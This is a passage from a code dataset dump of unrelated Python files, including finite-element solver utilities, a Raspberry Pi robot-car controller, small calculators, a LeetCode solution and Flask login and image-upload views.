By default, the solution vector is not\n expanded.\n\n Returns\n -------\n spmatrix or (spmatrix, ndarray) or (spmatrix, spmatrix)\n The condensed system.\n\n \"\"\"\n if isinstance(D, Dofs):\n D = D.all()\n\n if isinstance(I, Dofs):\n I = I.all()\n\n if x is None:\n x = np.zeros(A.shape[0])\n\n if I is None and D is None:\n raise Exception(\"Either I or D must be given!\")\n elif I is None and D is not None:\n I = np.setdiff1d(np.arange(A.shape[0]), D)\n elif D is None and I is not None:\n D = np.setdiff1d(np.arange(A.shape[0]), I)\n else:\n raise Exception(\"Give only I or only D!\")\n\n if b is None:\n ret_value = (A[I].T[I].T,)\n else:\n if isinstance(b, spmatrix):\n # generalized eigenvalue problem: don't modify rhs\n Aout = A[I].T[I].T\n bout = b[I].T[I].T\n elif isinstance(b, ndarray):\n Aout = A[I].T[I].T\n bout = b[I] - A[I].T[D].T @ x[D]\n else:\n raise Exception(\"The second arg type not supported.\")\n ret_value = (Aout, bout)\n\n if expand:\n ret_value += (x, I)\n\n return ret_value if len(ret_value) > 1 else ret_value[0]\n\n\ndef rcm(A: spmatrix,\n b: ndarray) -> Tuple[spmatrix, ndarray, ndarray]:\n p = spg.reverse_cuthill_mckee(A, symmetric_mode=False)\n return A[p].T[p].T, b[p], p\n\n\ndef solver_eigen_scipy(sigma: float,\n n: Optional[int] = 3,\n mode: Optional[str] = 'normal') -> EigenSolver:\n \"\"\"Solve generalized eigenproblem using SciPy (ARPACK).\n\n Parameters\n ----------\n sigma\n The parameter for spectral shift, choose a value near the\n expected eigenvalues.\n n\n The number of eigenpairs to solve.\n\n Returns\n -------\n EigenSolver\n A solver function that can be passed to :func:`solve`.\n\n \"\"\"\n def solver(K, M):\n from scipy.sparse.linalg import eigsh\n return eigsh(K, k=n, M=M, sigma=sigma, mode=mode)\n return solver\n\n\ndef solver_direct_scipy() -> LinearSolver:\n def solver(A, b):\n return spl.spsolve(A, b)\n return solver\n\n\ndef solver_direct_umfpack() -> LinearSolver:\n \"\"\"SciPy interface to umfpack.\"\"\"\n def solver(A, b):\n return spl.spsolve(A, b, use_umfpack=True)\n return solver\n\n\ndef build_pc_ilu(A: spmatrix,\n drop_tol: Optional[float] = 1e-4,\n fill_factor: Optional[float] = 20) -> spl.LinearOperator:\n \"\"\"Incomplete LU preconditioner.\"\"\"\n P = spl.spilu(A.tocsc(), drop_tol=drop_tol, fill_factor=fill_factor)\n M = spl.LinearOperator(A.shape, matvec=P.solve)\n return M\n\n\ndef build_pc_diag(A: spmatrix) -> spmatrix:\n \"\"\"Diagonal preconditioner.\"\"\"\n return sp.spdiags(1.0/A.diagonal(), 0, A.shape[0], A.shape[0])\n\n\ndef solver_iter_krylov(krylov: Optional[LinearSolver] = spl.cg,\n verbose: Optional[bool] = False,\n **kwargs) -> LinearSolver:\n \"\"\"Krylov-subspace iterative linear solver.\n\n Parameters\n ----------\n krylov\n A Krylov iterative linear solver, like, and by default,\n :func:`scipy.sparse.linalg.cg`\n verbose\n If True, print the norm of the iterate.\n\n Any remaining keyword arguments are passed on to the solver, in\n particular x0, the starting guess, and M, the preconditioner. 
If\n the latter is omitted, a diagonal preconditioner is supplied using\n :func:`skfem.utils.build_pc_diag`.\n\n Returns\n -------\n LinearSolver\n A solver function that can be passed to :func:`solve`.\n\n \"\"\"\n def callback(x):\n if verbose:\n print(np.linalg.norm(x))\n\n def solver(A, b):\n if 'M' not in kwargs:\n kwargs['M'] = build_pc_diag(A)\n sol, info = krylov(A, b, **{'callback': callback, **kwargs})\n if info > 0:\n warnings.warn(\"Convergence not achieved!\")\n elif info == 0 and verbose:\n print(f\"{krylov.__name__} converged to \"\n + f\"tol={kwargs.get('tol', 'default')} and \"\n + f\"atol={kwargs.get('atol', 'default')}\")\n return sol\n\n return solver\n\n\ndef solver_iter_pcg(**kwargs) -> LinearSolver:\n \"\"\"Conjugate gradient solver, specialized from solver_iter_krylov\"\"\"\n return solver_iter_krylov(spl.cg, **kwargs)\n\n\ndef solve(A: spmatrix,\n b: Union[ndarray, spmatrix],\n x: Optional[ndarray] = None,\n I: Optional[ndarray] = None,\n solver: Optional[Union[LinearSolver, EigenSolver]] = None) -> ndarray:\n \"\"\"Solve a linear system or a generalized eigenvalue problem.\n\n Parameters\n ----------\n A\n The system matrix\n b\n The right hand side vector or the mass matrix of a generalized\n eigenvalue problem.\n solver\n Choose one of the following solvers:\n\n - :func:`skfem.utils.solver_direct_scipy` (default)\n - :func:`skfem.utils.solver_eigen_scipy` (default)\n - :func:`skfem.utils.solver_direct_umfpack`\n - :func:`skfem.utils.solver_iter_pcg`\n\n \"\"\"\n if solver is None:\n if isinstance(b, spmatrix):\n solver = solver_eigen_scipy(10.0)\n return solver(A, b)\n elif isinstance(b, ndarray):\n solver = solver_direct_scipy()\n\n if x is not None and I is not None:\n y = x.copy()\n y[I] = solver(A, b)\n return y\n else:\n return solver(A, b)\n\n\ndef adaptive_theta(est, theta=0.5, max=None):\n if max is None:\n return np.nonzero(theta*np.max(est) < est)[0]\n else:\n return np.nonzero(theta*max < est)[0]\n\n\ndef derivative(x: ndarray,\n basis1: GlobalBasis,\n basis0: GlobalBasis,\n i: Optional[int] = 0) -> ndarray:\n \"\"\"Calculate the i'th partial derivative through projection.\n\n Parameters\n ----------\n x\n The solution vector.\n basis1\n The basis corresponding to the solution x (e.g. P_1).\n basis0\n The basis corresponding to the derivative field (e.g. 
P_0).\n i\n Return i'th partial derivative.\n\n Returns\n -------\n ndarray\n A new solution vector corresponding to the derivative.\n\n \"\"\"\n\n @bilinear_form\n def deriv(u, du, v, dv, w):\n return du[i]*v\n\n @bilinear_form\n def mass(u, du, v, dv, w):\n return u*v\n\n A = asm(deriv, basis1, basis0)\n M = asm(mass, basis0)\n\n return solve(M, A @ x)\n\n\ndef L2_projection(fun,\n basis: GlobalBasis,\n ix: Optional[ndarray] = None) -> ndarray:\n \"\"\"Initialize a solution vector with L2 projection.\n\n Parameters\n ----------\n fun\n The function to project.\n basis\n The finite element basis\n ix\n Do the projection only on a subset of DOF's.\n\n Returns\n -------\n ndarray\n The projected solution vector.\n\n \"\"\"\n\n if ix is None:\n ix = np.arange(basis.N)\n\n @bilinear_form\n def mass(u, du, v, dv, w):\n p = u * v\n return sum(p) if isinstance(basis.elem, ElementVectorH1) else p\n\n @linear_form\n def funv(v, dv, w):\n p = fun(*w.x) * v\n return sum(p) if isinstance(basis.elem, ElementVectorH1) else p\n\n M = asm(mass, basis)\n f = asm(funv, basis)\n\n return solve(*condense(M, f, I=ix, expand=False))\n","sub_path":"skfem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371957401","text":"\nE = 50000\nI = 100000\nS = I - E\nIR = 0.09\nDR = 0.02\nC = list(range(1))\nC[0] = S\nBE = list(range(1))\n\ne = input('Manual Entry [Y/N]: ') \n\nif e.lower() == 'y' :\n\tE = int(input('Expense: '))\n\tI = int(input('Income: '))\n\tC[0] = I - E + int(input('Initial Capital: '))\n\nx = 0\nwhile BE[x] <= 0 :\n\tx += 1\n\tC.append(round(C[x - 1] * (1 + IR) + S))\n\tBE.append(round(C[x -1] * DR - E))\n\tBEC = round(C[x]/1000, 2)\n\tprint('Year: ' + str(x) + ' Balance: ' + str(BE[x]/1000) + 'K GBP ' + 'Capital: ' + str(BEC) + 'K GBP.')\n\nBEC = round(C[x]/1000000, 2)\n\nprint('\\nBreakeven is at year ' + str(x) + ' with a capital of ' + str(BEC) + 'MM GBP.\\n')\n","sub_path":"SavingsCalculator.py","file_name":"SavingsCalculator.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328369560","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\n\nCURRENT_DIR = os.path.dirname( os.path.abspath(__file__) )\nPROJECT_DIR = os.path.join(CURRENT_DIR, '../')\n\n\n# The Way of the Voice\nsys.path.append( PROJECT_DIR )\n\nfrom utility.shape import multi, plain\nfrom subspack.event import TimeFormat\n\n\nshape = (2, 3)\nplain_index = 19\nmulti_index = (3, 0, 1)\nprint( multi(shape, plain_index) )\nprint( plain(shape, multi_index) )\n\n\ntime_str = '0:11:22.33'\n\nformatter = TimeFormat('SSA')\nfrom_str = formatter.from_str(time_str)\n\nprint( from_str )\n\n","sub_path":"learning/parsingtime.py","file_name":"parsingtime.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312418624","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport RPi.GPIO as GPIO\nimport RaspberryCar_pb2\nimport time\nimport threading\n\n# Shorthand for the high/low signal levels\nS_H = GPIO.HIGH\nS_L = GPIO.LOW\n\n# GPIO pin definitions for the signal interfaces\n\n# L298N motor control\nL298N_IN1 = 35\nL298N_IN2 = 36\nL298N_IN3 = 37\nL298N_IN4 = 38\n\n# Relay\nJD_IN1 = 11\nJD_IN2 = 13\n\n# Servos\nSG90_H = 12\nSG90_V = 16\n\n# Ultrasonic distance sensing\nTRIG = 18\nECHO = 15\n\n# Infrared obstacle detection\nIR_OUT1 = 22\nIR_OUT2 = 24\nIR_OUT3 = 26\nIR_OUT4 = 28\n\n\nclass Car(object):\n \"\"\"docstring for Car\"\"\"\n\n def __init__(self):\n super(Car, self).__init__()\n # Initialize the server model\n self.server_model = RaspberryCar_pb2.RCSocketServerModel()\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Shutoff\n self.server_model.carInfo.forwardBarrier = False\n self.server_model.carInfo.leftwardBarrier = False\n self.server_model.carInfo.rightwardBarrier = False\n # Set the GPIO pin numbering mode\n GPIO.setmode(GPIO.BOARD)\n # Initialize the L298N pins\n GPIO.setup(L298N_IN1, GPIO.OUT)\n GPIO.setup(L298N_IN2, GPIO.OUT)\n GPIO.setup(L298N_IN3, GPIO.OUT)\n GPIO.setup(L298N_IN4, GPIO.OUT)\n # Relay\n GPIO.setup(JD_IN1, GPIO.OUT)\n GPIO.setup(JD_IN2, GPIO.OUT)\n # Servos\n GPIO.setup(SG90_H, GPIO.OUT, initial=False)\n self.pwm_h = GPIO.PWM(SG90_H, 50) # 50HZ\n self.pwm_h.start(0)\n GPIO.setup(SG90_V, GPIO.OUT, initial=False)\n self.pwm_v = GPIO.PWM(SG90_V, 50) # 50HZ\n self.pwm_v.start(0)\n # Ultrasonic distance sensing\n GPIO.setup(TRIG, GPIO.OUT)\n GPIO.setup(ECHO, GPIO.IN)\n # Infrared obstacle detection\n GPIO.setup(IR_OUT1, GPIO.IN)\n GPIO.setup(IR_OUT2, GPIO.IN)\n GPIO.setup(IR_OUT3, GPIO.IN)\n GPIO.setup(IR_OUT4, GPIO.IN)\n\n self.forward_barrier_lock = threading.Lock()\n self.supersonic_wave_thread = threading.Thread(target=self.loop_supersonic_wave, name=\"supersonic_wave_thread\")\n self.supersonic_wave_thread.start()\n\n self.camera_lock = threading.Lock()\n self.camera_h_enable = False\n self.camera_h_thread = threading.Thread(target=self.loop_camera_h, name=\"camera_h_thread\")\n self.camera_h_thread.start()\n self.camera_v_enable = False\n self.camera_v_thread = threading.Thread(target=self.loop_camera_v, name=\"camera_v_thread\")\n self.camera_v_thread.start()\n\n # State that has to be polled in a loop\n def loop_supersonic_wave(self):\n while True:\n GPIO.output(TRIG, 0)\n time.sleep(0.01)\n GPIO.output(TRIG, 1)\n time.sleep(0.00001)\n GPIO.output(TRIG, 0)\n start_time = time.time()\n stop_time = 0\n while GPIO.input(ECHO) == 0:\n start_time = time.time()\n while GPIO.input(ECHO) == 1:\n stop_time = time.time()\n distance = (stop_time - start_time) * 34000 / 2 # the speed of sound is 340 m/s\n self.forward_barrier_lock.acquire()\n self.server_model.carInfo.forwardBarrier = (distance <= 10)\n self.forward_barrier_lock.release()\n if (self.server_model.carInfo.forwardBarrier is True) and \\\n (self.server_model.carInfo.status == RaspberryCar_pb2.CarStatus_Forward):\n self.stop()\n if (not GPIO.input(IR_OUT1) or not GPIO.input(IR_OUT2)) \\\n and (self.server_model.carInfo.status == RaspberryCar_pb2.CarStatus_Leftward):\n self.stop()\n if (not GPIO.input(IR_OUT3) or not GPIO.input(IR_OUT4)) \\\n and (self.server_model.carInfo.status == RaspberryCar_pb2.CarStatus_Rightward):\n self.stop()\n\n def loop_camera_h(self):\n while self.camera_h_enable is True:\n for i in range(0, 181, 10):\n self.pwm_h.ChangeDutyCycle(2.5 + 10 * i / 180) # set the rotation angle\n time.sleep(0.02) # wait for the 20 ms period to end\n self.pwm_h.ChangeDutyCycle(0) # zero out the signal\n time.sleep(0.2)\n for i in range(181, 0, -10):\n self.pwm_h.ChangeDutyCycle(2.5 + 10 * i / 180)\n time.sleep(0.02)\n self.pwm_h.ChangeDutyCycle(0)\n time.sleep(0.2)\n\n def loop_camera_v(self):\n while self.camera_v_enable is True:\n for i in range(90, 181, 10):\n self.pwm_v.ChangeDutyCycle(2.5 + 10 * i / 180) # set the rotation angle\n time.sleep(0.02) # wait for the 20 ms period to end\n self.pwm_v.ChangeDutyCycle(0) # zero out the signal\n time.sleep(0.2)\n for i in range(181, 90, -10):\n self.pwm_v.ChangeDutyCycle(2.5 + 10 * i / 180)\n time.sleep(0.02)\n self.pwm_v.ChangeDutyCycle(0)\n time.sleep(0.2)\n\n # Handle control commands\n def handle_control(self, control):\n if control == RaspberryCar_pb2.Control_None:\n pass\n elif control == RaspberryCar_pb2.Control_Shutdown:\n self.shut_down()\n elif control == RaspberryCar_pb2.Control_Bootup:\n self.bootup()\n elif control == RaspberryCar_pb2.Control_Forward:\n self.forward()\n elif control == RaspberryCar_pb2.Control_Backward:\n self.backward()\n elif control == RaspberryCar_pb2.Control_Leftward:\n self.leftward()\n elif control == RaspberryCar_pb2.Control_Rightward:\n self.rightward()\n elif control == RaspberryCar_pb2.Control_CarStop:\n self.stop()\n elif control == RaspberryCar_pb2.Control_Camera_Horizontal:\n self.camera_lock.acquire()\n self.camera_h_enable = True\n self.camera_lock.release()\n elif control == RaspberryCar_pb2.Control_Camera_Vertical:\n self.camera_lock.acquire()\n self.camera_v_enable = True\n self.camera_lock.release()\n elif control == RaspberryCar_pb2.Control_Camera_Stop:\n self.camera_lock.acquire()\n self.camera_h_enable = False\n self.camera_v_enable = False\n self.camera_lock.release()\n\n # Power on the car\n def bootup(self):\n GPIO.output(JD_IN1, S_L)\n GPIO.output(JD_IN2, S_H)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Stop\n\n # Power off the car\n def shut_down(self):\n GPIO.output(JD_IN1, S_L)\n GPIO.output(JD_IN2, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Shutoff\n\n # Stop\n def stop(self):\n GPIO.output(L298N_IN1, S_L)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_L)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Stop\n\n # Move forward\n def forward(self):\n GPIO.output(L298N_IN1, S_H)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_H)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Forward\n\n # Move backward\n def backward(self):\n GPIO.output(L298N_IN1, S_L)\n GPIO.output(L298N_IN2, S_H)\n GPIO.output(L298N_IN3, S_L)\n GPIO.output(L298N_IN4, S_H)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Backward\n\n # Turn left\n def leftward(self):\n GPIO.output(L298N_IN1, S_H)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_L)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Leftward\n\n # Turn right\n def rightward(self):\n GPIO.output(L298N_IN1, S_L)\n GPIO.output(L298N_IN2, S_L)\n GPIO.output(L298N_IN3, S_H)\n GPIO.output(L298N_IN4, S_L)\n self.server_model.carInfo.status = RaspberryCar_pb2.CarStatus_Rightward\n\n # Update some of the car's parameters\n def update_car_info(self, socket_client_model, host):\n self.server_model.reqChannel = socket_client_model.reqChannel\n self.server_model.socketVersion = socket_client_model.socketVersion\n self.server_model.reqType = socket_client_model.reqType\n self.server_model.reqId = socket_client_model.reqId\n self.server_model.carInfo.ipAddress = host\n self.server_model.carInfo.cameraUrl = \"http://\" + host + \"/?action=stream\"\n\n # Get the car's status\n def get_car_status(self):\n return self.server_model.SerializeToString() + \"\\r\\n\"\n\n","sub_path":"PythonServer/Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410555001","text":"import logging\nimport warnings\nfrom collections.abc import Iterable, Sequence\nfrom numbers import Integral, Number\n\ntry:\n import torch\n from torch.utils.data import DataLoader\n\n has_torch = True\nexcept ImportError:\n has_torch = False\n\n\nLOGGING_FORMATTER = logging.Formatter(\"%(asctime)s|%(name)s|%(levelname)s| %(message)s\")\n\n\ndef setup_logger(logger, level=logging.INFO):\n \"\"\"DEPRECATED. 
Resets formatting and stdout stream handler to the logger\n\n Args:\n logger: logger from `logging` module\n level: logging verbosity level\n\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n if logger.hasHandlers():\n for h in list(logger.handlers):\n logger.removeHandler(h)\n\n logger.setLevel(level)\n\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(level)\n ch.setFormatter(LOGGING_FORMATTER)\n logger.addHandler(ch)\n\n\ndef add_logger_filehandler(logger, filepath):\n \"\"\"DEPRECATED. Adds additional file handler to the logger\n\n Args:\n logger: logger from `logging` module\n filepath: output logging file\n\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n # create file handler which logs even debug messages\n fh = logging.FileHandler(filepath)\n fh.setLevel(logger.level)\n fh.setFormatter(LOGGING_FORMATTER)\n logger.addHandler(fh)\n\n\ndef set_seed(seed):\n \"\"\"DEPRECATED. Setup seed for numpy, random, torch\n\n Args:\n seed (int): any integer random seed\n\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n import random\n import numpy as np\n import torch\n\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n\ndef assert_config(config, required_fields):\n \"\"\"DEPRECATED. Method to check the config if it has required fields of specified type\n\n Args:\n config: Configuration object to check\n required_fields (Sequence of (str, type)): Required attributes that should exist in the configuration.\n \"\"\"\n warnings.warn(\"This helper method is deprecated and will be removed in 0.3.0\")\n\n if not isinstance(required_fields, Sequence):\n raise TypeError(\n \"Argument required_fields should be a Sequence of (str, type), \"\n \"but given {}\".format(type(required_fields))\n )\n for field in required_fields:\n if not (isinstance(field, Sequence) and len(field) == 2):\n raise ValueError(\"Entries of required_fields should be (str, type), but given {}\".format(type(field)))\n k, t = field\n obj = getattr(config, k, None)\n if obj is None:\n raise ValueError(\"Config should have attribute: {} of type {}\".format(k, t))\n if t is not None:\n if not isinstance(obj, t):\n raise TypeError(\"config.{} should be of type {}, but given {}\".format(k, t, type(obj)))\n\n\ndef get_params(config, required_fields):\n \"\"\"Method to convert configuration into a dictionary matching `required_fields`.\n\n Args:\n config: configuration object\n required_fields (Sequence of (str, type)): Required attributes that should exist in the configuration.\n For example, `((\"a\", (int, str)), (\"b\", str),)`\n\n Returns:\n a dictionary\n\n \"\"\"\n assert_config(config, required_fields)\n params = {}\n for k, _ in required_fields:\n obj = getattr(config, k)\n k = k.replace(\"_\", \" \")\n if isinstance(obj, (Number, str, bool)):\n params[k] = obj\n elif hasattr(obj, \"__len__\"):\n params[k] = len(obj)\n if hasattr(obj, \"batch_size\"):\n params[\"{} batch size\".format(k)] = obj.batch_size\n elif hasattr(obj, \"__class__\"):\n params[k] = obj.__class__.__name__\n\n return params\n\n\nBASE_CONFIG = (\n (\"seed\", Integral),\n (\"debug\", bool),\n)\n\n\nif has_torch:\n\n TORCH_DL_BASE_CONFIG = BASE_CONFIG + (\n (\"device\", str),\n (\"model\", torch.nn.Module),\n )\n\n TRAIN_CONFIG = TORCH_DL_BASE_CONFIG + (\n (\"train_loader\", (DataLoader, Iterable)),\n (\"num_epochs\", Integral),\n (\"criterion\", 
torch.nn.Module),\n (\"optimizer\", torch.optim.Optimizer),\n )\n\n TRAINVAL_CONFIG = TRAIN_CONFIG + (\n (\"train_eval_loader\", (DataLoader, Iterable)),\n (\"val_loader\", (DataLoader, Iterable)),\n (\"lr_scheduler\", object),\n )\n\n INFERENCE_CONFIG = TORCH_DL_BASE_CONFIG + (\n (\"data_loader\", (DataLoader, Iterable)),\n (\"weights\", str),\n (\"training_run_uuid\", str),\n )\n","sub_path":"py_config_runner/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"213103017","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport re\nfrom collections import Counter\n\n\ndef main():\n\n counting_str = 'ccccdaababbbccccdd'\n\n slice_num = 3\n result = count_str_chars(counting_str, slice_num)\n\n print(result)\n\n\ndef count_str_chars(counting_str: str, slice_num: int) -> str:\n\n assert isinstance(counting_str, str)\n assert isinstance(slice_num, int)\n\n prepared_str = prepare_str(counting_str)\n sorted_chars_str = sort_chars(prepared_str)\n frequent_chars = get_frequent_chars(sorted_chars_str, slice_num)\n\n return frequent_chars\n\n\ndef prepare_str(input_str: str) -> str:\n\n output = re.sub(r'\\s*', '', input_str)\n\n return output.lower()\n\n\ndef sort_chars(input_str: str) -> str:\n\n sorted_alphabetic = ''.join(sorted(input_str))\n\n counted_chars = Counter(sorted_alphabetic)\n\n sorted_list_of_tuples_chars = counted_chars.most_common()\n sorted_list_chars = [item[0] for item in sorted_list_of_tuples_chars]\n\n return ''.join(sorted_list_chars)\n\n\ndef get_frequent_chars(slice_str: str, slice_index: int) -> str:\n return slice_str[0: slice_index]\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"count_chars/count_chars.py","file_name":"count_chars.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"96392891","text":"from collections import Counter\n\n\"\"\"\nhttps://leetcode.com/problems/minimum-window-substring\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n A problem of finding, in O(n), the minimum sliding window that contains the given characters the required number of times.\n Think about solving it with two pointers.\n Solved with reference to the model answer, so try it again later.\n \"\"\"\n def minWindow(self, s: str, t: str) -> str:\n\n need = Counter(t)\n missing = len(t)\n\n left_idx = start_idx = end_idx = 0\n\n for right_idx, v in enumerate(s, 1):\n\n if need[v] > 0:\n missing -= 1\n need[v] -= 1\n\n if missing == 0:\n\n # Advance the left edge while it points at a character the window does not need\n while left_idx < right_idx and need[s[left_idx]] < 0:\n need[s[left_idx]] += 1\n left_idx += 1\n\n # Update the shortest window found so far\n if end_idx == 0 or end_idx - start_idx >= right_idx - left_idx:\n start_idx = left_idx\n end_idx = right_idx\n\n # Force the left edge one step forward\n need[s[left_idx]] += 1\n left_idx += 1\n missing += 1\n\n return s[start_idx: end_idx]\n","sub_path":"archive-dhkim/leetcode/ch20_sliding_window/prob76_minimum-window-substring.py","file_name":"prob76_minimum-window-substring.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"161057719","text":"from flask import Blueprint, render_template, url_for, request, flash, redirect, session\nfrom werkzeug.security import check_password_hash\nfrom werkzeug.utils import secure_filename\nfrom models.user import User\nfrom models.images import Image\nfrom models.follows import FollowerFollowing\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom 
instagram_web.util.s3_uploader import upload_file_to_s3\nfrom instagram_web.util.google_auth import oauth\n# from\nsessions_blueprint = Blueprint('sessions',\n __name__,\n template_folder='templates')\n\n\n@sessions_blueprint.route('/', methods=['GET'])\ndef index():\n return render_template('sessions/login.html')\n\n\n@sessions_blueprint.route('/verify', methods=['POST'])\ndef verif_login():\n username_get = User.get_or_none(User.name == request.form.get('user_name'))\n if username_get and check_password_hash(username_get.password, request.form.get('password')):\n login_user(username_get)\n flash('you are logged in!', 'success')\n # session['user'] = username_get.name\n return redirect(url_for('sessions.new'))\n else:\n flash(\"username and/or password is incorrect, please try again\", \"danger\")\n return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/new', methods=['GET'])\n@login_required\ndef new():\n if current_user:\n got_image = Image.select().where(Image.user_id == current_user.id)\n followers = FollowerFollowing.select().where(\n FollowerFollowing.fan == current_user.id)\n following = FollowerFollowing.select().where(\n FollowerFollowing.idol != current_user.id, FollowerFollowing.fan == current_user.id)\n return render_template('sessions/new.html', currentuser_name=current_user.name, got_image=got_image, followers=followers, following=following)\n # if \"user\" in session:\n # user = session['user']\n # return f'logged in as {user}'\n # else:\n # return abort()\n # return render_template('403.html')\n # return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/user/<id>')\n@login_required\ndef user_profile(id):\n is_followed = FollowerFollowing.get_or_none(\n fan=current_user.id, idol=id)\n followers = FollowerFollowing.select().where(FollowerFollowing.fan == id)\n following = FollowerFollowing.select().where(\n FollowerFollowing.idol != id, FollowerFollowing.fan == id)\n target_prof = User.get_or_none(User.id == id)\n if current_user:\n return render_template('sessions/user.html', target_prof=target_prof, is_followed=is_followed, followers=followers, following=following)\n\n\n@sessions_blueprint.route('/<id>/info')\n@login_required\ndef prof_info(id):\n if current_user:\n return render_template('sessions/profinfo.html', id=current_user.id)\n\n\n@sessions_blueprint.route('/<id>/update/', methods=['POST'])\n@login_required\ndef email_update(id):\n\n id = current_user.id\n # user = User.get_by_id(id)\n new_email = request.form.get('email_address')\n current_user.email = new_email\n\n query_email = User.get_or_none(User.email == new_email)\n # current_user.email = new_email\n if not query_email and len(new_email) != 0:\n current_user.save()\n flash(\"your email was updated successfully!\", 'success')\n return redirect(url_for('sessions.new'))\n else:\n flash(\n 'Email entered is associated with another account, please try again', 'danger')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n # if query_email and current_user.id == query_email.id:\n # current_user.email = new_email\n # current_user.save()\n\n\n'''execute way'''\n# mod_email = User(email=new_email).where(User.name == current_user.name)\n# mod_email = User.update(email=new_email).where(\n# User.name == current_user.name)\n\n# try:\n# # breakpoint()\n# mod_email.execute()\n# # mod_email.save()\n# flash('email updated successfully', 'success')\n# return redirect(url_for('sessions.new'))\n# except:\n# flash('something went wrong, try again', 'danger')\n# return redirect(url_for('sessions.prof_info'))\n@sessions_blueprint.route('/google_login')\ndef google_login():\n redirect_uri = url_for('sessions.google_auth', _external=True)\n return oauth.google.authorize_redirect(redirect_uri)\n\n\n@sessions_blueprint.route('/google_auth')\ndef google_auth():\n access_token = oauth.google.authorize_access_token()\n email = oauth.google.get(\n 'https://www.googleapis.com/oauth2/v2/userinfo').json()['email']\n user = User.get_or_none(User.email == email)\n if user:\n login_user(user)\n flash('you are logged in successfully!', 'success')\n return redirect(url_for('sessions.new'))\n else:\n flash('sumting wong', 'danger')\n return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/end', methods=['GET'])\ndef logout():\n # session.pop('user', None)\n logout_user()\n flash('successfully logged out', 'success')\n return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/upload', methods=['POST'])\n@login_required\ndef profimg_upload():\n file = request.files.get('profile_image')\n if 'profile_image' not in request.files:\n flash('no image has been provided', 'danger')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n if not upload_file_to_s3(file):\n file.filename = secure_filename(file.filename)\n flash('Oops! 
Something went wrong while uploading', 'warning')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n # else:\n # flash('upload complete')\n # return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n else:\n user = User.get_or_none(User.id == current_user.id)\n user.profile_image = file.filename\n\n user.save()\n\n flash('successfully added profile image!', 'success')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n\n@sessions_blueprint.route('/new/upload', methods=['POST'])\n@login_required\ndef usr_img_upload():\n usr_img = request.files.get('user_image')\n if 'user_image' not in request.files:\n flash('no image has been provided', 'danger')\n return redirect(url_for('sessions.new'))\n\n if not upload_file_to_s3(usr_img):\n usr_img.filename = secure_filename(usr_img.filename)\n flash('Oops! Something went wrong while uploading', 'warning')\n return redirect(url_for('sessions.new'))\n\n else:\n user = User.get_or_none(User.id == current_user.id)\n caption = request.form.get('img_caption')\n user_img = Image(\n user=user.id, user_img=usr_img.filename, caption=caption)\n user_img.save()\n flash('Image successfully uploaded!', 'success')\n return redirect(url_for('sessions.new'))\n","sub_path":"instagram_web/blueprints/sessions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"308665630","text":"from django.shortcuts import render, redirect\nfrom . import models\nfrom django.contrib import messages\n\n# Create your views here.\ndef index(request):\n\treturn render(request, 'mainProjectApp/index.html')\n\ndef newUser(request):\n\tres = models.User.objects.register(request.POST)\n\tmessage = \"registered\"\n\treturn processSignon(request, res, message)\n\ndef signOn(request):\n\tres = models.User.objects.login(request.POST)\n\tmessage = \"logged on\"\n\treturn processSignon(request, res, message)\n\ndef processSignon(request, res, message):\t\n\tif not res[0]:\n\t\tmessages.success(request, \"You have successfully {}!!!!\".format(message))\n\t\trequest.session['id'] 